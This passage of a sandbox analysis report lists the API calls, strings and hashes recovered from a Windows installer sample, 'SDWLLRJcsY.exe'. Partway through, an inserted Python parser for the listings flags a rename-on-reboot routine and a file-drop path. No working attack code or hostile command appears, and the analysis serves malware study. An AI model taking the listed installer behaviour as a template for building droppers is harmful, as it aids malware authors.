                                      • Opcode ID: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                      • Instruction ID: 3caff43168dd0751864d44f5cbb06f26c6104a46936f7057387f9fb8a2ee2b83
                                      • Opcode Fuzzy Hash: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                      • Instruction Fuzzy Hash: DFA197F1A00209ABDB11AFA5CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                      APIs
                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
                                      • GetDlgItem.USER32(?,000003E8), ref: 00404430
                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
                                      • GetSysColor.USER32(?), ref: 0040445E
                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                      • lstrlenW.KERNEL32(?), ref: 0040447F
                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                      • GetDlgItem.USER32(?,0000040A), ref: 004044FA
                                      • SendMessageW.USER32(00000000), ref: 00404501
                                      • GetDlgItem.USER32(?,000003E8), ref: 0040452C
                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040457D
                                      • SetCursor.USER32(00000000), ref: 00404580
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404599
                                      • SetCursor.USER32(00000000), ref: 0040459C
                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                      • String ID: : Completed$N
                                      • API String ID: 3103080414-2140067464
                                      • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                      • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
                                      • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                      • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59
                                      APIs
                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                      • BeginPaint.USER32(?,?), ref: 00401047
                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                      • DeleteObject.GDI32(?), ref: 004010ED
                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                      • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                      • DeleteObject.GDI32(?), ref: 00401165
                                      • EndPaint.USER32(?,?), ref: 0040116E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F
                                      • API String ID: 941294808-1304234792
                                      • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                      • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                      • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                      • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                      APIs
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406033,?,?), ref: 00405ED3
                                      • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405EDC
                                        • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                        • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                      • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405EF9
                                      • wsprintfA.USER32 ref: 00405F17
                                      • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                      • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                      • GlobalFree.KERNEL32(00000000), ref: 00406000
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406007
                                        • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SDWLLRJcsY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                        • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                      • String ID: %ls=%ls$[Rename]
                                      • API String ID: 2171350718-461813615
                                      • Opcode ID: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                      • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
                                      • Opcode Fuzzy Hash: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
                                      • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
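The records above are Joe Sandbox disassembly listings: one APIs list per function, with "Part of subcall function" lines attributing calls made by callees, and a String ID field under Similarity that joins the recovered strings with "$". The Python below is an added example, not part of the Joe Sandbox report or its tooling. It parses those lines into structured call records, separates direct calls from subcall-attributed ones, pulls out resolved string arguments and drive-letter paths (such as the Roaming\intercessionate\... path in the SHBrowseForFolderW record), and flags the combination seen in the record directly above: GetShortPathNameW feeding wsprintfA with the "[Rename]" and "%ls=%ls" strings, which is consistent with an installer stub writing an INI [Rename] section for a rename-on-reboot. The two sample listings are copied from this page and serve as constructed input; splitting argument lists on commas is an assumption that holds for these lines but would break on a recovered string containing a comma.

```python
# Parser for Joe Sandbox 'APIs' / 'Similarity' listings (added example, not report tooling).
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# One call per line: optional subcall prefix, Api.MODULE(args), then 'ref: <addr>'.
# Calls without arguments appear as 'wsprintfA.USER32 ref: 00405F17' (no parens).
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
STRING_ID_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")
HEX_ARG_RE = re.compile(r"-?[0-9A-Fa-f]{8}")      # constants / addresses, e.g. -0000040A
DRIVE_PATH_RE = re.compile(r'^"?[A-Za-z]:\\')      # C:\... possibly quoted


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int                      # address of the call site
    subcall_of: Optional[int]     # callee address when attributed via a subcall line


@dataclass
class FunctionRecord:
    calls: List[ApiCall]
    strings: List[str]            # '$'-separated entries of the String ID field

    def direct_calls(self) -> List[ApiCall]:
        return [c for c in self.calls if c.subcall_of is None]

    def api_names(self) -> List[str]:
        return [c.api for c in self.direct_calls()]

    def string_args(self) -> Set[str]:
        """Arguments the sandbox resolved to strings (neither '?' nor hex constants)."""
        return {a for c in self.calls for a in c.args
                if a and a != "?" and not HEX_ARG_RE.fullmatch(a)}


def parse_listing(text: str) -> FunctionRecord:
    """Build a FunctionRecord from one function's APIs/Similarity text.
    Assumption: argument lists split cleanly on ',' (true for this page's lines)."""
    calls: List[ApiCall] = []
    strings: List[str] = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            raw = m.group("args")
            args = tuple(a.strip() for a in raw.split(",")) if raw is not None else ()
            sub = m.group("sub")
            calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                 int(m.group("ref"), 16), int(sub, 16) if sub else None))
            continue
        m = STRING_ID_RE.match(line)
        if m:
            strings = [s for s in m.group("ids").split("$") if s]
    return FunctionRecord(calls, strings)


def looks_like_wininit_rename(rec: FunctionRecord) -> bool:
    """GetShortPathNameW feeding wsprintfA with '[Rename]' and '%ls=%ls' strings:
    the INI rename-on-reboot routine visible in this page's listing."""
    apis = {c.api for c in rec.calls}
    return ({"GetShortPathNameW", "wsprintfA"} <= apis
            and "[Rename]" in rec.strings and "%ls=%ls" in rec.strings)


def filesystem_paths(rec: FunctionRecord) -> List[str]:
    """Drive-letter paths from the String ID field and resolved arguments, deduplicated."""
    out: List[str] = []
    for s in rec.strings + sorted(rec.string_args()):
        if DRIVE_PATH_RE.match(s) and s.strip('"') not in out:
            out.append(s.strip('"'))
    return out


# Constructed input: lines copied from this page's listing.
SAMPLE_RENAME = r"""APIs
• GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405EDC
  • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
• GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405EF9
• wsprintfA.USER32 ref: 00405F17
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
Similarity
• String ID: %ls=%ls$[Rename]
"""

SAMPLE_BROWSE = r"""APIs
• GetDlgItem.USER32(?,000003FB), ref: 004046FF
• SHBrowseForFolderW.SHELL32(?), ref: 004047DA
• lstrcmpiW.KERNEL32(: Completed,004236E8,00000000,?,?), ref: 00404817
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404913
Similarity
• String ID: : Completed$A$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$6B
"""

if __name__ == "__main__":
    for name, text in (("rename", SAMPLE_RENAME), ("browse", SAMPLE_BROWSE)):
        rec = parse_listing(text)
        print(name, "->", " > ".join(rec.api_names()),
              "| rename-on-reboot:", looks_like_wininit_rename(rec),
              "| paths:", filesystem_paths(rec))
```

Feeding every function record of a report through parse_listing gives a per-function call chain plus recovered strings that can be searched offline, which is the fastest way to locate the installer's file-drop and rename logic among the many GUI-only functions listed here.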
                                      APIs
                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                      • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SDWLLRJcsY.exe",00403318,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: "C:\Users\user\Desktop\SDWLLRJcsY.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 589700163-1569600145
                                      • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                      • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
                                      • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                      • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                      • GetSysColor.USER32(00000000), ref: 00404281
                                      • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                      • SetBkMode.GDI32(?,?), ref: 00404299
                                      • GetSysColor.USER32(?), ref: 004042AC
                                      • SetBkColor.GDI32(?,?), ref: 004042BC
                                      • DeleteObject.GDI32(?), ref: 004042D6
                                      • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                      • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                      • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                      • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                      APIs
                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                        • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                      • String ID: 9
                                      • API String ID: 163830602-2366072709
                                      • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                      • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                      • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                      • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
                                      APIs
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
                                      • GetMessagePos.USER32 ref: 00404B9D
                                      • ScreenToClient.USER32(?,?), ref: 00404BB7
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                      • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                      • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
                                      APIs
                                      • GetDC.USER32(?), ref: 00401DB6
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                      • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                      • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                      • String ID: Calibri
                                      • API String ID: 3808545654-1409258342
                                      • Opcode ID: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                      • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
                                      • Opcode Fuzzy Hash: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                      • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
                                      APIs
                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                      • MulDiv.KERNEL32(00074600,00000064,000F2F30), ref: 00402E20
                                      • wsprintfW.USER32 ref: 00402E30
                                      • SetWindowTextW.USER32(?,?), ref: 00402E40
                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                      Strings
                                      • verifying installer: %d%%, xrefs: 00402E2A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                      • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
                                      • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                      • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                      • GlobalFree.KERNEL32(?), ref: 00402950
                                      • GlobalFree.KERNEL32(00000000), ref: 00402963
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                      • String ID:
                                      • API String ID: 2667972263-0
                                      • Opcode ID: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                      • Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
                                      • Opcode Fuzzy Hash: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                      • Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98
                                      APIs
                                      • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                      • wsprintfW.USER32 ref: 00404B16
                                      • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s$6B
                                      • API String ID: 3540041739-3884863406
                                      • Opcode ID: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                      • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
